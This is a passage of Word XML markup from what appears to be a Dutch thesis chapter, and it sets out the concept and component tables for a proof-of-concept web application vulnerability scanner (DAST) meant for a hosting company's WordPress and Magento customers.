      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dynamic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Application Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (DAST) tool ga ontwikkelen voor de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of concept. Ik heb in mijn vooronderzoek twee DAST-tools onderzocht, dit heb ik gedaan omdat 1) DAST-tools voorlopers zijn</w:t>
      </w:r>
      <w:r w:rsidR="00793D11">
        <w:t xml:space="preserve"> op het gebiedt van </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanners 2) omdat zij de twee DAST-tools alle fundamentele kenmerken hebben van een </w:t>
      </w:r>
      <w:r w:rsidR="00426958">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanner. Ik zal mij voor het concept focussen op deze fundamentele kenmerken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8961C" w14:textId="3FFDDFFE" w:rsidR="00F35D5A" w:rsidRPr="000F3678" w:rsidRDefault="00F35D5A" w:rsidP="00F35D5A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F3678">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Inleiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3ED8D" w14:textId="36234505" w:rsidR="000872AB" w:rsidRDefault="000436AA" w:rsidP="00F35D5A">
      <w:r w:rsidRPr="000436AA">
        <w:t xml:space="preserve">Dit is het volgende stap in het </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B" w:rsidRPr="000436AA">
        <w:t>ontwikkelproces</w:t>
      </w:r>
      <w:r w:rsidRPr="000436AA">
        <w:t xml:space="preserve"> van een </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B" w:rsidRPr="000436AA">
        <w:t>softwareapplicatie</w:t>
      </w:r>
      <w:r w:rsidRPr="000436AA">
        <w:t xml:space="preserve">, het ontwikkelen van een concept. </w:t>
      </w:r>
      <w:r w:rsidR="00DC50E2">
        <w:t xml:space="preserve">Hiervoor heb ik een onderzoek gedaan naar de theorie van een </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00DC50E2">
        <w:t xml:space="preserve"> scanner hierna zal ik de realisatie van de software documenteren, maar dit deel zal gaan over het concept. </w:t>
      </w:r>
      <w:r w:rsidR="008276E5">
        <w:t xml:space="preserve">In dit deel zal ik de </w:t>
      </w:r>
      <w:r w:rsidR="00C66F28">
        <w:t>concepten van</w:t>
      </w:r>
      <w:r w:rsidR="008276E5">
        <w:t xml:space="preserve"> alle componenten di</w:t>
      </w:r>
      <w:r w:rsidR="005A4CEA">
        <w:t xml:space="preserve">e deel uitmaken van het systeem beschrijven. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986E82C" w14:textId="59C07963" w:rsidR="001D6523" w:rsidRDefault="00906705" w:rsidP="00F35D5A">
      <w:r>
        <w:t>Om een terugkoppeling te mak</w:t>
      </w:r>
      <w:r w:rsidR="00974FA7">
        <w:t>en naar hoofdstuk 1 (Inleiding</w:t>
      </w:r>
      <w:r w:rsidR="002E5FCD">
        <w:t xml:space="preserve"> van de scriptie</w:t>
      </w:r>
      <w:r w:rsidR="00974FA7">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002E5FCD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D25F9">
        <w:t xml:space="preserve">wil ik het primaire hebben het doel van de </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="004D25F9">
        <w:t xml:space="preserve"> scanner. </w:t>
      </w:r>
      <w:r w:rsidR="003F524C">
        <w:t xml:space="preserve">Het doel van dit project is om een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F524C">
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F524C">
        <w:t xml:space="preserve"> of Concept te ontwikkelen van een </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="003F524C">
        <w:t xml:space="preserve"> scanner. Dit in de vorm van een MVP </w:t>
      </w:r>
      <w:r w:rsidR="001C3A11">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C3A11">
        <w:t>Minimal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C3A11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C3A11">
        <w:t>Viable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C3A11">
        <w:t xml:space="preserve"> Product), wat een versie van een </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>softwareapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="001C3A11">
        <w:t xml:space="preserve"> di de aan de minimale eisen voldoet om te kunnen functioneren.</w:t>
      </w:r>
      <w:r w:rsidR="00D82A58">
        <w:t xml:space="preserve"> Deze soort producten zijn vooral aanbevolen voor als een onderneming wilt</w:t>
      </w:r>
      <w:r w:rsidR="00B00F2F">
        <w:t xml:space="preserve"> experimenteren</w:t>
      </w:r>
      <w:r w:rsidR="00D82A58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002561B3">
        <w:t xml:space="preserve">met een nieuwe ideeën. </w:t>
      </w:r>
      <w:r w:rsidR="004D30C5">
        <w:t xml:space="preserve">Omdat het een grote investering zou zijn mocht het echt ontwikkeld worden, is het een praktische keuze geweest om eerst te gaan experimenteren met het idee van een geïntegreerde </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="004D30C5">
        <w:t xml:space="preserve"> scanner. </w:t>
      </w:r>
      <w:r w:rsidR="00813128">
        <w:t xml:space="preserve">Zo is ook uit mijn onderzoek gebleken dat het implementeren van een </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>gelijksoortig</w:t>
      </w:r>
      <w:r w:rsidR="00813128">
        <w:t xml:space="preserve"> systeem kostbaar kan zijn mocht het door een derde partij gedaan worden. Ook het gebruik maken van een </w:t>
      </w:r>
      <w:r w:rsidR="00D61A0A">
        <w:t xml:space="preserve">web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E57B8B">
        <w:t>security service</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D61A0A">
        <w:t>, deze zal de testen in met hen eigen tools en in hen eigen omgeving</w:t>
      </w:r>
      <w:r w:rsidR="00373C62">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001F3651">
        <w:t xml:space="preserve">kan in de kosten lopen. </w:t>
      </w:r>
      <w:r w:rsidR="00432A1D">
        <w:t xml:space="preserve">Mijn eigen quote uit hoofdstuk 1 geeft aan </w:t>
      </w:r>
      <w:r w:rsidR="00C0798A">
        <w:t xml:space="preserve">dat het aanbieden van een gratis </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00C0798A">
        <w:t xml:space="preserve"> scanner enkel voor de klanten van S5, anders zou het niet rendabel meer zijn, zorgt voor een elegante oplossing voor dit financiële probleem.</w:t>
      </w:r>
      <w:r w:rsidR="00D61A0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D82A58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F00A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB210C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00974FA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDA4B73" w14:textId="254B6DD0" w:rsidR="00694EF7" w:rsidRDefault="003F524C" w:rsidP="003F524C">
      <w:r>
        <w:t xml:space="preserve">“Een gratis </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanner dat makkelijk te gebruiken is voor een bestaande klant van S5 zou ideaal zijn om de kostenpost van consultancy</w:t>
      </w:r>
      <w:r w:rsidR="009955BC">
        <w:t xml:space="preserve"> en dure licentie te omzeilen”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4C5383" w14:textId="0DC55EE3" w:rsidR="00432A1D" w:rsidRPr="007236B5" w:rsidRDefault="00E9695F" w:rsidP="003F524C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007236B5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Concepten die behandeld worden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5ED86" w14:textId="2FDCB992" w:rsidR="00E9695F" w:rsidRDefault="009955BC" w:rsidP="003F524C">
      <w:r>
        <w:t xml:space="preserve">Het systeem bestaat uit kern componenten en ondersteunende componenten. </w:t>
      </w:r>
      <w:r w:rsidR="003C6ED2">
        <w:t>Ik zal mij</w:t>
      </w:r>
      <w:r w:rsidR="004D5CE4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C6ED2">
        <w:t xml:space="preserve"> in dit deel primaire focussen op de kern componenten, zo kan ik de rol van de ondersteunede componenten beter omschrijven. </w:t>
      </w:r>
      <w:r w:rsidR="00D27D2E">
        <w:t xml:space="preserve">Alle </w:t>
      </w:r>
      <w:r w:rsidR="00477BAA">
        <w:t xml:space="preserve">componenten en processen die </w:t>
      </w:r>
      <w:r w:rsidR="00D27D2E">
        <w:t>in hoofdstuk 3 (Onderzoek, WASC) voorkomen zal ik in dit deel behandelen.</w:t>
      </w:r>
      <w:r w:rsidR="006200D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00455139">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="004913E7">
        <w:t xml:space="preserve">ok zal ik uitleggen </w:t>
      </w:r>
      <w:r w:rsidR="007B3DF4">
        <w:t>welke rollen de verscheidenen technologieën hebben voor elke component of proces.</w:t>
      </w:r>
      <w:r w:rsidR="00D27D2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6ED2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486AC88A" w14:textId="3D8AE78E" w:rsidR="00D702F9" w:rsidRDefault="00D702F9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E21A84" w14:textId="3C80DC65" w:rsidR="007B3DF4" w:rsidRDefault="00F6756D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6756D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kern componenten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693E396" w14:textId="42E37432" w:rsidR="001E02BB" w:rsidRPr="001E02BB" w:rsidRDefault="00190A53">
      <w:r>
        <w:t xml:space="preserve">De kern componenten zoals deze in WASC </w:t>
      </w:r>
      <w:r w:rsidR="001D5B79">
        <w:t xml:space="preserve">WASSEC document </w:t>
      </w:r>
      <w:r w:rsidR="006544E3">
        <w:t xml:space="preserve">geven een overzicht van de onderdelen waar een webapplicatie minimaal uit moet bestaan. </w:t>
      </w:r>
      <w:r w:rsidR="005B721F">
        <w:t>Binnen het project context komt er nog één kern component bij, de database.</w:t>
      </w:r>
      <w:r w:rsidR="00CB5D05">
        <w:t xml:space="preserve"> Kern componenten zijn essentieel voor de werking van de applicatie, waarom de database een essentiële componenten is zal ik later in het document beargumenteren.</w:t>
      </w:r>
      <w:r w:rsidR="005B721F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1577"/>
        <w:gridCol w:w="2411"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D4635" w14:paraId="1DA3B06F" w14:textId="77777777" w:rsidTr="001E02BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1577" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE04421" w14:textId="77777777" w:rsidR="007D4635" w:rsidRDefault="007D4635" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A297BA" w14:textId="77777777" w:rsidR="007D4635" w:rsidRDefault="007D4635" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D4635" w14:paraId="70D58124" w14:textId="77777777" w:rsidTr="001E02BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1577" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF9BD25" w14:textId="77777777" w:rsidR="007D4635" w:rsidRDefault="007D4635" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53DA17F2" w14:textId="626AF769" w:rsidR="007D4635" w:rsidRDefault="00B56A8A" w:rsidP="00F57D0D">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D4635" w14:paraId="11636322" w14:textId="77777777" w:rsidTr="001E02BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1577" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75BC985F" w14:textId="77777777" w:rsidR="007D4635" w:rsidRDefault="007D4635" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2E619B" w14:textId="1C1632C5" w:rsidR="007D4635" w:rsidRDefault="00D36E03" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D4635" w14:paraId="0660B203" w14:textId="77777777" w:rsidTr="001E02BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1577" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CDED171" w14:textId="77777777" w:rsidR="007D4635" w:rsidRDefault="007D4635" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B159777" w14:textId="57F84362" w:rsidR="007D4635" w:rsidRDefault="002E7F33" w:rsidP="00F57D0D">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Command</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Line Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D4635" w14:paraId="64A6FA06" w14:textId="77777777" w:rsidTr="001E02BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1577" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4699C148" w14:textId="77777777" w:rsidR="007D4635" w:rsidRDefault="007D4635" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1398B6BC" w14:textId="77777777" w:rsidR="007D4635" w:rsidRDefault="007D4635" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Rapporteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E4A45" w14:paraId="4CBEB7E8" w14:textId="77777777" w:rsidTr="001E02BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1577" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458C84A2" w14:textId="39569364" w:rsidR="008E4A45" w:rsidRDefault="008E4A45" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC90482" w14:textId="5AA11D21" w:rsidR="008E4A45" w:rsidRDefault="008E4A45" w:rsidP="00F57D0D">
            <w:r>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ABFEC62" w14:textId="25E439CC" w:rsidR="001F75EF" w:rsidRDefault="006544E3" w:rsidP="003F524C">
      <w:r>
        <w:t>Tabel 4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A1DA7" w14:textId="2897FEEC" w:rsidR="001F75EF" w:rsidRPr="001D33A6" w:rsidRDefault="00395A2F" w:rsidP="003F524C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D33A6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ondersteunende componenten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B70D5" w14:textId="5A5E2B1F" w:rsidR="00395A2F" w:rsidRDefault="00CA4EA2" w:rsidP="003F524C">
      <w:r>
        <w:t xml:space="preserve">Dit zijn componenten die het de kern applicatie bruikbaar maken binnen de </w:t>
      </w:r>
      <w:r w:rsidR="00811B0B">
        <w:t xml:space="preserve">project </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">context waarin </w:t>
      </w:r>
      <w:r w:rsidR="00811B0B">
        <w:t xml:space="preserve">ik dit systeem ontwikkelen. Een deel van het project context is: de klanten van S5 de mogelijkheid geven om een scan aan te vragen doormiddel van een </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>CMS-extensie</w:t>
      </w:r>
      <w:r w:rsidR="00811B0B">
        <w:t xml:space="preserve">. Zonder deze ondersteunende componenten kunnen de klanten geen gebruik kunnen maken van de </w:t>
      </w:r>
      <w:r w:rsidR="00E57B8B">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00811B0B">
        <w:t xml:space="preserve"> scanner.</w:t>
      </w:r>
      <w:r w:rsidR="0048721B">
        <w:t xml:space="preserve"> De kern applicatie is niet afhankelijk van deze ondersteunende componenten maar het project</w:t>
      </w:r>
      <w:r w:rsidR="00595240">
        <w:t>doel</w:t>
      </w:r>
      <w:r w:rsidR="0048721B">
        <w:t xml:space="preserve"> wel.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr w:rsidR="00300135" w14:paraId="03C61A3A" w14:textId="77777777" w:rsidTr="00300135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62BCF6E3" w14:textId="6A14D732" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="065847C6" w14:textId="205FDFE1" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:r>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00300135" w14:paraId="4581A3D5" w14:textId="77777777" w:rsidTr="00300135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E8C563" w14:textId="65616C0E" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:r>
              <w:t xml:space="preserve">Ondersteunend </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39E94826" w14:textId="34117148" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00300135" w14:paraId="1B278B0B" w14:textId="77777777" w:rsidTr="00300135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19770DE7" w14:textId="437D1A7E" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:r>
              <w:t xml:space="preserve">Ondersteunend </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075D2380" w14:textId="4BC2D9E2" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>WordPress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> extensie </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00300135" w14:paraId="361242C5" w14:textId="77777777" w:rsidTr="00300135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="570DD88C" w14:textId="07120AEC" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:r>
              <w:t xml:space="preserve">Ondersteunend </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49394B80" w14:textId="02AE8427" w:rsidR="00300135" w:rsidRDefault="00300135" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Magento</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> extensie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A34A81" w14:paraId="3BAF6912" w14:textId="77777777" w:rsidTr="00300135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66CAD238" w14:textId="17794C9B" w:rsidR="00A34A81" w:rsidRDefault="00A34A81" w:rsidP="003F524C">
            <w:r>
              <w:t xml:space="preserve">Ondersteunend </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DEF9839" w14:textId="50387780" w:rsidR="00A34A81" w:rsidRDefault="00A34A81" w:rsidP="003F524C">
            <w:r>
              <w:t>Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C6CB56C" w14:textId="3009A85A" w:rsidR="0048721B" w:rsidRDefault="00793F0C" w:rsidP="003F524C">
      <w:r>
        <w:t>Tabel 4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC53FA" w14:textId="213FF2F3" w:rsidR="006176AD" w:rsidRPr="005F281B" w:rsidRDefault="00864E81" w:rsidP="003F524C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="005F281B" w:rsidRPr="005F281B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>rocessen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA06F7" w14:textId="4D4558D1" w:rsidR="005F281B" w:rsidRDefault="00F57D0D" w:rsidP="003F524C">
      <w:r>
        <w:t>Naast de componenten zijn er ook processen</w:t>
      </w:r>
      <w:r w:rsidR="004358BE">
        <w:t xml:space="preserve"> die uit worden gevoerd op verschillende momenten van het system cyclus.</w:t>
      </w:r>
      <w:r w:rsidR="00DC7FD7">
        <w:t xml:space="preserve"> Ieder component heeft</w:t>
      </w:r>
      <w:r w:rsidR="00113E2D">
        <w:t xml:space="preserve"> processen waarvan een aantal beschreven staan in het WASC WASSEC document. Processen zijn weer onderverdeelt in functies die een beschrijving geven van de verschillende operaties die een proces uitvoert. </w:t>
      </w:r>
      <w:r w:rsidR="0011587D">
        <w:t>Een aantal van deze functies zal ik in de realisatie deel omschrijven.</w:t>
      </w:r>
      <w:r w:rsidR="003C2BEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F37FE7">
        <w:t xml:space="preserve">Ondersteunende componenten hebben ook processen. Deze verschillen veel van elkaar omdat er gebruik wordt gemaakt van verschillende </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F37FE7">
        <w:t>frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F37FE7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="1441"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F859AF" w14:paraId="750A37EF" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F4A1438" w14:textId="75ACA677" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C15C9C7" w14:textId="3F82ABD3" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67F67598" w14:textId="6758933F" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
